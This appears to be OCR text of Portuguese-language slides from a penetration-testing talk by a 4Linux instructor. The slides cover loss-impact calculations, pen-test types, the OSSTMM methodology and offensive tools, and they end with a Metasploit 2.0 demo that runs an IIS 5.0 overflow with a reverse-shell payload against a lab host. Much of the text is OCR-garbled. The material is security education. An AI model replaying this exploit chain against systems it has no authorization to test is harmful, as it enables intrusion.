YOUR INTELLIGENCE IN LINUX WWWwW.4LINUX.COM.BR

YOUR INTELLIGENCE IN LINUX WWW.4LINUX.COM.BR

Sandro Melo CSO

- ¿Linux

4 | (sandro@4linux.com.br)

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 2

YOUR INTELLIGENCE IN LINUX WWW.4LINUX.COM.BR |

Axzecutando Pan [DST voces ubiligenclo Perramentas de Codigo Ad Aberto e a Wetodoloyíz R

(OSS TAVI)

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 3

LINGUA l Nossa Agenda

destaque para o Penetration Test (PT)

Definição de escopo de um Penetration Testing Tipos de Penetration Testing

Tipos de Teste de Segurança

Analise de Vulnerabilidades vs Penetratin Testing Ferramentas de Software Livre disponíveis Conceitos de Exploits

A Ferramentas customizadas para instrusao de

"Wi Sistemas

Acronimos: AV - Analise de Vulnerabilidades PT - Penetration Testing DOS - Denial of Service DDOS - Distributed Denial of Service

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 4

YOUR INTELLIGENCE IN LINUX Sum Tzu WWW.4LINUX.COM.BR

“Se você conhece o inimigo e conhece asi mesmo, não precisa temer o resultado de cem batalhas. Se você se conhece mas não conhece o inimigo, para cada vitória ganha sofrerá também uma derrota. Se você não conhece nemo inimigo nem asi mesmo, perderá todas as batalhas...”

| We xtraído da obra: " A Arte da Guerra"

Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 5

LINUX {Nossa Realidade

O Brasil é o pais No 1 em ataques e atacantes.

As empresas estão usando cada vez mais a internet para a realização de seus negócios.

O valor da informação é o cerne do negócio.

Ser administrador de sistemas ligados a internet

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 6

D sata Sofisticacao das Técnicas

Pent-test automatizados- , PERA CGIWEB -

DOS /DDOS Exploits

Rootkits Scanners de

Vulnerabilidades OverFlow/Worm

Port Scanners

Sniffers / IP Hijack Backdoors

Desativação de autidoria Vulnerabilidades conhecidas

Código auto-replicados ROBERT Programas p/ cracking de senhas norris

Adivinhação de senhas 1988 1980 1985 1990 1995 2000 2002 2005 Baixa

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 7

Alto

A

Nível de conhecimento

ai 198 199 199 200 200 200

21X >

Prof. la Melo - DT com.br - http: ://meustte. ÍA com.br/sanaro/ - 8 J

Sofisticação das ferrametas Alto

198 198 199 199 200 200 200 Pa lx :

m 2 9 Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 9

LB LIINUX TI - Negócios

WWW.4LINUX.COM.BR

Até onde o investimento de TI representa vantagem estratégica em relação a sua concorrência”?

Se o seu investimento na área de TI fosse comprometido, até onde isso refletiria em seu negócio?

Como mensurar ou mesmo quantificar o valor de um NS possível prejuizo relacionado a um ataque de cracker ou ON | ScriptKiddies a estrutura de TI de sua empresa?

Diante desses cenarios devemos investir em Seguranca de TI? í 0

Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 10

£ - e

e E os Mensurar a importância de investimento em segurança pode ser

dificil. Mas mensurar o valor de prejuízos causados por um servidor estratégico que foi invadido, não o é. Podemos com certeza afirmar que pode deixar qualquer um de cabelo em pé!!!

<p LINUX

YOUR INTELLIGENCE IN LINUX WWW.4LINUX.COM.BR

Tenteancdo mens impncesro cle urna Ilnyasio

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 12

LD LIN U

YOUR INTELLIGENCE IN LINUX WWW.4LINUX.COM.BR

“Imagine uma o corporação com um grande investimento de tempo e dinheiro em uma estrutura de Internet, tendo servidores DNS, Servidores de Correio, Servidores Web, ligação com sua filial através de VPN e tudo uma cultura assumida dentro desse cenário”

® iP válido e NAT

O IP Inválido

i <a> =

Linux Firewall IDS Proxy Gateway

Lisi Linux

: . Firewall Firewall Pia ee HIDS NIDS

R . Servidor de HIDS Ea E Correio

Proxy Anti-Vírus Gateway ome DNS Webmail

Linux E Linux Firewall = VPN IDS = Firewall Servidor Į: NIDS Netsaint |: HIDS = Proxy Gateway

Rede Periferica

q pr Wt wi {DI mamaaa US i «on

SWITCH/HUB

= tm 10 IIA cam

= DA ŘŮ

~ SWITCH

a ONO OOo " = seo = as os AAA AA J o Esta£0es

= Ooo a z Linux / Windows = u Esta£0es = Linux Linux : n : Uini E Linux / Windows : > Servidor de} | Servidor de | = . : = Linux Linux x na Arquivos ImpressPiso | = = w Em - z E : Servidor n E m | | = = | Servidor de Servidor de DHCP = no . E = =: | Arquivos ImpressPiso ranet a EE E E JE : E =. 8 Ma: E : : Ee O O:

DLINUX À Cálculando o Impacto

WWW.4LINUX.COM.BR

Suponhamos que essa estrutura venha a ser prejudicada parcialmente ou mesmo integralmente por atividades de invasores (Crackers, Insiders, Scripkiddies)

Podemos mensurar o valor de um possível prejuizo através de algumas técnicas, vide a seguir:

SLE (Single Loss Expectancy) - que consistem em mensurar em termos financeiros o o impacto de um Y incidente.

| YALE (Annualized Loss Expectancy) - Esta formula

- consiste em equacionar a SLE, e o número de eventos ocorridos em um determinado periodo de tempo.

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 15

pla And | Cálculando o Impacto

Imagine o custo dessa estrutura que foi implementada ao longo de um ano por uma equipe de cinco pessoas que utilizavam cento e sessenta horas por mês. Com um salário de RS 3.000,00 para cada um, estimamos um custo/ora na casa dos RS 20,00 (acrescidos encargos, benefícios e outros).

Uma vulnerabilidade no servidor principal deste sistema, Ny explorada por ameaças internas ou externas ( insiders - Wfuncionário insatisfeito, crackers ou ScriptKiddies) poderiam

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 16

em qa dd Cálculando o o Impacto

WWW. 4LINUX.COM.BR

Neste cenário o prejuizo deste sistema pode ser calculado da seguinte forma:

8 (horasflia) x 240 (dias Ano) x 5 (número de pessoas) = 9.600 horas

RS 20,00 (custo hora) x 9.600 (horas) = R$192.000,00

Prejuizo total de RS 192.000,00 => 100%.

Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 17

TONES Cálculando o Impacto

WWW. 4LINUX. COM.BR

Ainda neste cenário imagine essa empresa com 500 funcionários, onde 75% possuem acesso a rede.

Cada um destes 375 tem seu trabalho prejudicado devido a problema ou mesmo inoperância de algum componente da Infra mencionada totalizando em torno de 1 hora semanal.

xi Com um valor hora na faixa de RS 10,00 ficamos - com um prejuizo acumulado de, aplicando a formula do ALE:

Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 18

WWW. 4LINUX.COM.BR

Prejuízo mensurável pontual : 379 (funcionários) x 1 (hora por semana) (semanas) = 375,00 horas

RS 10,00 (custo hora) x 375,00 (horas) = R$3,750,00 (por dia)

375 (funcionári arios) x 1 (hora por semana) x 44 (semanas) = 16.500 horas

RS 10,00 (custo hora) x 16.500 (horas) = RS165.000,00 (em 1 ano)

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 19

TONES | Evitandoo problema!

Uma forma de evitar que a infra seja prejudicada por ataques é em TESTAR sua segurança VOCE "WA MESMO!!!

Prof. Sandro Melo - sandro@4linux.com.6r - http://meusite.mackenzie.com.br/sandro/ - 20

YOUR INTELLIGENCE IN LINUX WWW.4LINUX.COM.BR |

Conceltuznelo técnica de ¡Pemstest

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 21

A realização de PEN-TEST torna-se um mecanismo importante para avaliar de forma qualitativa e até mesmo quantitativa os problemas de seguranca que

possam existir.

X qm Deve ser utilizando dentro de um planejamento de Nsegurança bem definido e com metodologia concisa.

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 22

D LIN UX t Ambientes p/ um Pen-test

Tipos de ambientes p/ Pen-test

Wireless Lan Topologia de redes periféricas (DMZ) Data Center com acesso a Internet Portais Extranet ~< Intranet ~ Ņ\ Pontos de Accesso via VPN ' | Pontos de conexao Dial-up

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 23

D LOIN O X i PEN-TEST vs. Analise 12

Análise de Vulnerabilidades (AV)

No caso de um teste de Analise de Vulnerabilidade o Consultor tem fazer a varreduras para os vulnerabilities no usuário ou a aplicação e para filtrar para fora os positivos falsos da varredura output traçando os com os vulnerabilities reais associados com o anfitrião do alvo.

A partir de Scanners Customizados, mas com objetivo de identificar os problemas mas não com o objetivo intrusivo

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 24

DLINU: x PEN-TEST vs. Analise 22

Usando ferramentas customizadas como NESSUS (GPL), ISS SCAN (Proprietária), Retina (Proprietária), seria fazer um PEN-TEST?

Obs.: Uma Análise de Vulnerabilidades é diferente de PEN-TEST! A Analise de Vulnerabilidade é uma dos técnicas de Teste de Segurança que um CSO ou SO pode utilizar como recurso em seus projeto de seguranca.

WAtualmente o Pen-Test pode ser conceituando também

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 25

Conceitualmente o PEN-TEST também pode se definido como é uma técnica que podemos utilizar para realização de teste de segurança. Inumeramos a seguir outras Network Scanning (Varreduras)

Vulnerability Scanning ( A.de Vulnerabilides) Password Cracking (Bruteforce)

Log Review (Analise de logs)

NNW Intregrity Ckeckers (Analise de Intergridade)

\Mitm Test (Analise a partir da LAN)

- War Dialing (teste em sistema com dial-up)

War Driving (Teste em sistema Wireless LAN) Rootkit Detection (Detecção de vírus / trojans)

Prof. Sandro Melo - sandro04linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 26

SD LINUX t Ferramental 28

AD LINUX ( Ferramental 18

| Software Livre que esta diretamente vinculado à verdadeira cultura Hacker de liberdade do conhecimento encontramos um número MUITO GRANDE de códigos das mais variadas ferramentas que podem ser usadas para Testes de Segurança. Network Scanners: YA - Nmap; = Hping3;

* Unicornscan; canners Vulnerabilidades: - Nessus; - Sussen; - Nikto.pl;

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 27

Password Crack (Bruteforce): - John the Ripper ou Crack;

- Hydra;

- Brutus.pl;

Intregrity Ckeckers:

- Aide;

- Tripwire;

- Osiris;

UN Mitm Test (Sniffers / Arpspoofing, IP Hijack): W-Ettercap;

- Ethereal;

- Dsniff;

- Vnccrack;

Prof. Sandro Melo - sandro@4linux.com.6r - http://meusite.mackenzie.com.br/sandro/ - 28

AD LIN U t Ferramental 38

War Dialing: - THC-Dialup Login Hacker (UNIX);

War Driving (Teste em sistema Wireless LAN): - Airsnort;

- Kismet;

- Wepcrack;

Y Rootkits, Trojans, Virus and Worn Detection: W-chkrootkit; - Rkdet;

AD LIN U ( Ferramental 38

Pen-test - Exploits Customizados

- Framework MetaSploit (aprox. 32 testes);

- Remote Access Session (aprox. 69 testes - old); - Neat (aprox. 30 testes

Disto CD-Live; Knoppix STD; we -XPL Morpheio; N- PHLAK;

- PlanB;

- Auditor;

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ -

DLINUX Ù Técnicas p/ Pen-Test

Usando o conceito atual de Pen-test combinando as demais técnicas de teste de segurança, o “Pentester’ normalmente irá executá-las na seguinte ordem:

Inciara com o Footprinting: Levantamento de informaçõe básicas Teste de Engenharia Social

Utilização das Técnicas de Fingerprinting

| ) q Levantamento e mapeamento da Rede Alvo: NUtilização de técnicas Ports Scanning Enumeração de informações dos serviços encontrados

Avaliação de Políticas de Firewall Utilização de Scanners de Vulnerabilidades

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 31

LINUX T Técnicas p/ Pen-Test

Técnicas Intrusivas:

Exploração de vulnerabilidades conhecidas nos serviços identificados.

Exploração de Vulnerabilidades em aplicações Web.

Técnicas de Bruteforce p/ serviços e Cracking de WE Senhas.

WTeste de Negação de Servico (DOS).

Escalação de Privilégio.

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 32

D LINUX ( Fluxograma Pen-test

Planejamento_____, Levantamento __ „p Ataque

de escopo de dados

Laudo Técnico

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 33

LINUX $ Fluxograma Pen-test Planejamento | |

de escopo Levantamento Tentativas de de dados ganho de acesso Varreduras Análise de Vulnerabilidade Escalside | Privilégio ou acesso - nivel de Sugestao de Administrador

Correcoes |

Flaboracao do Laudo

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 34

em qa dd hes t Pen-test - Caixa Preta

Black Box Penetration Testing

O Analista (Pen-tester) não receber informações do ambiente remoto a ser testado, salvo informaçoes básicas como o | IP Address e o nome da empresa. Ou seja, “totalmente as escura é iniciado o processo - ide Pen-test.

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 35

LD LINUX Pen-test - Caixa Branca

White Box Penetration Testing

O Analista (Pen tester) inicia sua atividade tendo informações do ambiente como :

Tipo de serviço de redes;

A Detalhes sobre versoes e aplicações; NN Informações sobre Sistema; Operacionais a serem testados; Firewall e IDS implementados; Bancos de dados utilizados.

Prof. Sandro Melo - sandro@4linux.com.6r - http://meusite.mackenzie.com.br/sandro/ - 36

em qa dd has \Pen-test nao Instrusivo

“Levantamento de Dados |

Analise de Vulnerabilidades

Identificação de possiveis vulnerabilidades encontradas

Limitase apenas a correlação de JA “exploit”apropriados para exploração das Wi vulnerabilidades identificas.

Não é realizado teste para identificação de possibilidades de Negação de Serviço (DOS)

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 37

Penetration Test Não Instrusivo I= m > Teste de Engenharia. Social | y

Uso de técnicas de Fingerprinting e Footprinting

Sondagem da Rede Avaliando Políticas de Firewall

Analisando Logs e gerando Relatório

j

Uso de técnicas de PortScanning e final com as Enumeração Serviços Recomendações & ciclos de trabalhos a

Scanners de serem adotados

Vulnerabilidade =o

| Serviços de Rede É Correlação de f - ---- Vulnerabilidades | Aplicações Web

conhecidas

|

|

sl

Apenas correlacao l |

|

Cracking de Senhas / CL ooo oc] Brute Force de Serviços

LINUX 1 Pen-test Instrusivo

Levantamento de Dados Analise de Vulnerabilidades

Identificação de possiveis vulnerabilidades encontradas

Correlação de “exploit”apropriados para WE exploração das vulnerabilidades

Videntificadas, e sua utilização para ganhar de acesso.

Identificação de possibilidades de Negação de Serviço (DOS)

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 39

Penetration Test Instrusivo I= m > Teste de Engenharia. Social |

Ý Uso de técnicas de Fingerprinting e Footprinting

Sondagem da Rede j Avaliando Políticas de Firewall

Analisando Logs e Uso de técnicas de gerando Relatório PortScanning e final com as Enumeração Serviços Recomendações & ciclos de trabalhos a

Scanners de serem adotados

Vulnerabilidade = == Exploração de Servicos de Rede i Vulnerabilidades Aplicações Web conhecidas

ra é dps / Escala de Privilégio ee ee ee (Ganhando Acesso a Shell)

Teste de Negação de Serviço L = = = = = ee J (DOS)

AN | Resultado Desejado!

Após a: a realização de todos as é desej que o Pen-tester reuna todos os dados levantados, dados como:

- Sistemas operacionais dos servidores da rede alvo; - Serviços de redes, versões e possível vulnerabilidades; - Possibilidades de ataques de Bruteforce; _- Dados de usuários enumerados como senhas e “id”; ~- Possibilidades de Denial of Services; - Possibilidades de acesso remotos arbitrários;

"+ Qualificando cada problema identificado a partir de referência de grau de risco; - - Sugerir correções para as vulnerabilidades identificadas.

Wletocloloviz E Práticas

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 42

LINUX T METODOLOGIA

Normas tem por objetivo definir regras claras e boas práticas para realizações de processos, são construidas reunindo experiências de vários profissionais.

Para realização de Pen-test temos disponível a norma OSSTMM e OSSIMM Wireless desenvolvido inicialmente por Peter Herzog da ISECOM, hoje contando com vários

especialistas em segurança como colaboradores. Disponível para download em www.isecom.org.

| \OBS.; Outro documento interessante seria: Guideline Network Security Testing elaborado pelo NIST-USA, disponível em

WWW.Csrc.nist.gov

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 43

LD LIINUX t OSSTMM

A Norma organiza todas técnicas de Teste de Segurança usadas em conjunto para elaboração de Pen-test, organizando em 6 tópicos macros:

- Information Security

- Process Security (Engenharia Social) - Internet Techonology Security

- Communications Security

. Wireless Security - Physical Security

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 44

YOUR INTELLIGENCE IN LINUX WWW.4LINUX.COM.BR |

Conhecendo

WletaSoloit Herne yoele

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 45

TONES l MetaSploit Framework

O Metasploit Framework é uma plataforma avançada de Código Aberto para Pen-test. O projeto começou inicialmente com objetivo de ser um ferramenta poderosa, customizada para testar a segurança de serviços de Redes.

É um projeto novo que necessita de colaboradores. Sendo relevante lembrar que N ferramentas equivalentes como CANVAS e CORE IMPACT são extremamente caras!

Site do projeto: www.metasploit.com

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 46

em a dd ha MetaSploit Framework

Escrito em Perl, inclui os vários componentes escritos em C, em Assembler e em Python.

O suporte a linguagem Perl permite que funcione em vários sistemas Unix-like e também em ambiente Cygwin.

me O Core do projeto é duplo-licenciado sob as —N licencas GPLv2 e Perl Artistic Licenses, permitindo que seja usado em projeto de Códigos Abertos como também Projetos Comerciais.

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 47

YOUR INTELLIGENCE IN LINUX WWW.4LINUX.COM.BR

Thustenacdo un Pen-tost COLON

Wletasolois Meme sy ori

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 48

#:) MetasploliFPramework Web Console v2.0- konqueror Location Edit View Go Bookmarks Tools Settings Window Help de ~ G J E e

ES Location: || me http127.0.0.1:55555/

Metasploit v2.0 Exploit Index

Apache Win32 Chunked Encoding Blackice/RealSecure/Other ISS ICQ Parser Buffer Owerflow Exchange 2000 MSOS-46 Heap Overflow Frontpage fp5SOreg.dIl Chunked Encoding IA WebMail 3.x Buffer Overflow

IIS 5.0 Printer Buffer Overflowy

IIS 5.0 WebDAV ntdll.dll Owerflow

IIS 5.0 nsiislog.dll POST Overflow

IMail LDAP Service Buffer Overflow MSSOL 2000 Resolution Overflow Microsoft RPC DCOM MSOS-026

PoPToP Negative Read Overflowy RealServer Describe Buffer Owerflow Samba trans2open Overflow

Sambar 6 Search Results Buffer Overflow Serv-U FTPD MDTM Overflow

Solaris sadmind Command Execution Universal Plug N Play Overflowv War-FTPD 1.65 PASS Overflow

sj Metasploit Framework Web Console v2.0- Konqueror

Location Edit View Go Bookmarks Tools Settings window Help

Qaa QO AAA ADA

E> Location: || as http 27.0.0.1:55555/MODE=SUMMARY&MODULE=|IS 5.0 Printer Buffer Overflow Module: IIS 5.0 Printer Buffer Overflow

Mame: IIS 5,0 Printer Buffer Overflow Wersion: $Revision: 1.18 $ Authors: HO Moore <hdm [at] metasploit.com> [Artistic License]

This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS,

This module works against Windows 2000 service pack O and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process,

* http: / /www.osvdb.org/548 * http: / /www.microsoft.com/technet/security/bulletin/MSO1-023.mspx « http://lists.insecure.org/lists/bugtrag/2001/May/0011.html

Select Payload

Exploit Listing | Metasploit.com

æ Page loaded. CE

hambB=lashe: í m&fweb -wv [*] Starti rp 2,0 Web Interface on 127,0, O EA SUMMARY TIS 5,0 Printer Euffer

E

eE

so Metasploit Framework Web Console v2.0 - Konquerol

Location Edit View Go Bookmarks Tools Settings window Help

QQA0 0G MAA AO

E> Location: || a ITFUNC=sehgoPT LHOST=192.168.1.724480PT LPORT=999980PT TARGET=08Exploitáction=Launch+Exploit

Processing exploit request (IIS 5.0 nstislog.dll POST Overflow)... Using payload: winreverse

[Wed Apr 7 23:30:34 2004] ¡¡s50_nsiislog_post EXPLOIT 192.168.1.214 C] Starting Reverse Handler.

[“] Attempting to exploit target Windows 2000 Pre-MS03-019

C] Sending 65919 bytes to remote host.

C] Waiting for a response...

C] Got connection from 192.168.1.214:1093

C] Proxy shell started on 192.168.1.244:33770

#) Shell- Konsole Session Edit view Bookmarks Settings Help

hdm@slasher I telnet 192,166,1,244 sar Trying 192,168,1,2d44,

Connected to 192, 16s. 1. dd,

Escape character is E

Metasploit Web Inter

Microsoft Windows 2000 [version {Co} Copyright 1965-1999 Microsoft Corp,

E nee as dar + Ll LI +o am |

EC: AUTHHTS=uy=tem3e2>[]

| Shell |

[a

| PORT=80

EXPLOIT IIS 5,0 neiisloe,d11 POST Overflow PAYLOAD=winrewer=e HOST=192.168.1.214 EN EXPLOIT IIS 5,0 nsiislog.dll POST Overflow PAYLOAD=winreverse HOST=192,168,1,214 | E +

=

AG LIN U XK Sun Tzu

YOUR INTELLIGENCE IN LINUX WWW.4 LINUX.COM.BR

“Na paz, preparar-se para a guerra; na guerra, preparar-se para paz. A arte da guerra é de importância vital para o Estado. Uma questão de vida ou morte, um caminho tanto para a segurança como para a ruína. Assim, em nenhuma circunstância deve ser descuidada...”

Y Extraído da obra: "A Arte da Guerra" - Sun Tzu

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 52

DLINUX f Bibliografia

ISO NBR 17799

«Manpage do Nmap

«Norma OSSTMM e OSSTMM Wireless -www.isecom.br * Www.axur.com.br

e www.metasploit.com

* WWW.nessus.org

ewww.ussback.com

*ICMP usase in Scanning - Ofir Arkin (www.sys-security.com)

eX remote ICMP based OS fingerprinting techniques - Ofir Arkin e Fyodor Yarochkin

(www.sys-security.com).

Copia dessa palestra: http://meusite.mackenzie.com.br/sandro

Prof. Sandro Melo - sandro@4linux.com.br - http://meusite.mackenzie.com.br/sandro/ - 54

LB LINA Meu Livro

WWW.4LINUX.COM.BR

Exploração de Vulnerabilidades em Redes TCP/IP foi idealizado penta para suprir as necessidades dos administradores dos novos | eee tempos. No passado, era comum instalarmos um servidor e EXPIORACAO DE simplesmente esquecermos dele, pois o acesso era exclusivo da ll LAN da corporação. Com o advento da Internet tudo mudou; uma VULNERABILIDADE vez na Internet, seu servidor está ao alcance do mundo.

Administradores de sistemas que buscam conhecimentos em segurança de redes irão encontrar sólidas informações sobre técnicas utilizadas por invasores, sejam eles:

e Atacantes externos, como Crackers e Script Kiddies e Atacantes internos, como Insiders “Pseudo-consultores conhecidos como Gray Hats

Entre as técnicas abordadas, podemos destacar: Fingerprint, Footprint, Varreduras, Negação de Serviço, Bruteforce de Serviços e Ataques Internos. Além dessas, tambérm são abordadas técnicas utilizadas em Sistema Operacional “Like Unix”, tendo o Linux como referência.

Informaçoes na url:

http://www.temporeal.com.br/produtos.php?id= 168767

Prof. Sandro Melo - sandro@4linux.com.6r - http://meusite.mackenzie.com.br/sandro/ - 55